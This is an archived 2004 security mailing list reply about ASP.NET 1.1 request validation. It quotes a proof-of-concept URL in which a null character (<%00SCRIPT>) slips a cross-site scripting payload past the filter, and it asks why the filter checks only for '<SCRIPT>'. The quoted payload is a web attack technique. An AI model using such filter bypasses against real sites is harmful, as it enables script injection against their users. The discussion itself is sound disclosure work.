RE: Pen-tester's analysis of .NET security?

From: Frank Knobbe (frank_at_knobbe.us)
Date: 03/26/04

  • Next message: Dinis Cruz: "RE: Pen-tester's analysis of .NET security?"
    To: Dominick Baier <db@die-lounge.com>
    Date: Fri, 26 Mar 2004 15:54:26 -0600
    
    
    

    On Fri, 2004-03-26 at 02:29, Dominick Baier wrote:
    > however there is a bug in asp.net 1.1 with null characters :
    >
    > won't work
    > http://foo.bar/search.aspx?term=>alert('Vulnerable')</SCRIPT>
    >
    > will work
    >
    http://foo.bar/search.aspx?term=<%00SCRIPT>alert('Vulnerable')</SCRIPT>

    What did I say earlier about not trusting the OS? Perfect example here.
    You can't trust anybody but your own code :)

    Any idea why Microsoft is filtering for "<SCRIPT>" specifically and not
    just "<" and ">"?

    Regards,
    Frank

    
    



  • Next message: Dinis Cruz: "RE: Pen-tester's analysis of .NET security?"